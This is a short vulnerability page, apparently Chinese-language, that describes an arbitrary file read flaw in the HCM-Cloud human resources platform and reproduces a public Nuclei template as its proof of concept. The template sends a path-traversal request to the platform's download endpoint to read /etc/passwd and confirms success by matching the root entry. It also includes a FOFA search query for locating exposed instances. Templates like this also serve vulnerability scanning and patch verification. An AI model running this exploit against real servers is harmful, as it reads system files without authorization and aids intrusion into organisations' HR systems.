漏洞描述
HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability.
hcm-cloud-lfi: HCM Cloud - Arbitrary File Read
PoC代码[已公开]
id: hcm-cloud-lfi
info:
name: HCM Cloud - Arbitrary File Read
author: s4e-io
severity: high
description: |
HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability.
reference:
- https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw
- https://github.com/wy876/POC/blob/main/%E6%B5%AA%E6%BD%AE%E4%BA%91/HCM-Cloud%E4%BA%91%E7%AB%AF%E4%B8%93%E4%B8%9A%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%B9%B3%E5%8F%B0download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-859381597"
tags: hcm-cloud,lfi,hcm,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/model_report/file/download?index=/&ext=/etc/passwd"
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(content_type, "application/octet-stream")'
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100fc385823ca681c797f18c21dafa3221df3a3ba60f1c911ede1307f9f9371a9e0022100f51544172c1eab5a5b259b595317a04d14bca18de0c448603fe3f10f03ea8f71:922c64590222798bb761d5b6d8e72950